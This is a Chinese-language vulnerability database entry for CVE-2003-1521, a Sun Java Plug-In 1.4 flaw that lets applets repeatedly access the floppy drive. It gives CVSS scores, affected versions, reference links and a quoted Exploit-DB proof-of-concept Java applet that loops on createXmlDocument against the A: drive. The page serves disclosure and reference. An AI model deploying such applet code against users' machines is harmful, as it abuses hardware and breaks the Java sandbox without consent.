CVE-2003-1521
CVSS6.4
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:37:09
NMCOE    

[原文]Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.


[CNNVD]Sun Java非法Java程序软盘访问漏洞 (CNNVD-200312-139)

        Sun Java Plug-In 1.4到1.4.2_02版本存在漏洞。远程攻击者借助org.apache.crimson.tree.XmlDocument类别的createXmlDocument类函数重复地访问软盘驱动器,该漏洞违反了Java安全模型。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sun:java_plug-in:1.4.2_01Sun Java Plug-In 1.4.2_01
cpe:/a:sun:java_plug-in:1.4.2_02Sun Java Plug-In 1.4.2_02
cpe:/a:sun:java_plug-in:1.4.2Sun Java Plug-In 1.4.2
cpe:/a:sun:java_plug-in:1.4Sun Java Plug-In 1.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1521
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1521
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-139
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/8867
(UNKNOWN)  BID  8867
http://www.securityfocus.com/archive/1/341943
(UNKNOWN)  BUGTRAQ  20031021 IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive

- 漏洞信息

Sun Java非法Java程序软盘访问漏洞
中危 设计错误
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        Sun Java Plug-In 1.4到1.4.2_02版本存在漏洞。远程攻击者借助org.apache.crimson.tree.XmlDocument类别的createXmlDocument类函数重复地访问软盘驱动器,该漏洞违反了Java安全模型。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (23270)

Sun Java Plug-In 1.4 Unauthorized Java Applet Floppy Access Weakness (EDBID:23270)
windows remote
2003-10-21 Verified
0 Marc Schoenefeld
N/A [点击下载]
source: http://www.securityfocus.com/bid/8867/info

A weakness has been reported in Java implementations that may constitute unauthorized access by Java applets to floppy devices. This weakness appears to present a flaw in the Java security model.

This issue was reported in Java Plug-in 1.4.x versions on Microsoft Windows operating systems, when run with Internet Explorer. Other environments and versions may also be affected.

import java.awt.Label;

public class MyFloppySucks extends java.applet.Applet {
private Label m_labVersionVendor;
public MyFloppySucks () //constructor
{
m_labVersionVendor = new Label ("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org" +" / Java Version: " +
System.getProperty("java.version")+
" from "+System.getProperty("java.vendor"));
this.add(m_labVersionVendor);
}
public void paint(java.awt.Graphics g) {
while (1==1)
try {

org.apache.crimson.tree.XmlDocument.createXmlDocument("file:///a:/",false);
}
catch (Exception e) {
System.out.println("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org");
}
}
} 		

- 漏洞信息

60428
Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
Remote / Network Access
Loss of Integrity

- 漏洞描述

- 时间线

2003-10-21 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站